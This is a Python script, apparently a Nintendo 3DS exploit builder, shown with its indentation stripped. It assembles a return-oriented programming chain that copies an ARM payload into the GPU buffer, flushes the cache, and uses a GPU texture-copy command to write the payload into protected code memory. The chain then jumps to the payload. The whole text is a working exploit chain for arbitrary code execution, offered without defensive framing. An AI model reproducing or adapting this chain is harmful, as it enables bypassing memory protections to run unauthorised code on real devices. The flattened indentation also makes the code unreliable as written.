def main(argv):
arm_code = ""
with open(argv[0], "rb") as fp:
arm_code = fp.read()
armCodeSize = len(arm_code)
arm_code += struct.pack("<I", 0xDEADBEEF) * (16 - armCodeSize % 16)
armCodeSize += (16 - armCodeSize % 16)
r = ROP(0x002B0000)
r.call_lr(memcpy, [gsp_addr + gsp_code_addr, Ref("arm_code"), armCodeSize])
# pop {r4-r6, pc}
r.call(GSPGPU_FlushDataCache + 4, [gsp_handle, 0xFFFF8001, gsp_addr + gsp_code_addr, armCodeSize], 3)
# ldmfd sp!, {r4-r8, pc}
r.call(nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue + 4, [0x27c580 + 0x58, Ref("gxCommand")], 5)
r.pop_pc()
r.pop_pc()
r.pop_pc()
r.call_lr(svcSleepThread, [0x3B9ACA00, 0x00000000])
# Jump to payload
r.i32(0x100000 + payload_addr)
# Data
r.label("gxCommand")
r.i32(0x00000004) # SetTextureCopy
r.i32(gsp_addr + gsp_code_addr) # source
r.i32(gsp_addr + fcram_code_addr + payload_addr) # destination
r.i32(armCodeSize) # size
r.i32(0x00000000) # dim in
r.i32(0x00000000) # dim out
r.i32(0x00000008) # flags
r.i32(0x00000000) # unused
r.label("arm_code")
r.data(arm_code)
rop = r.gen()
with open(argv[1], "wb") as fl:
fl.write(rop)
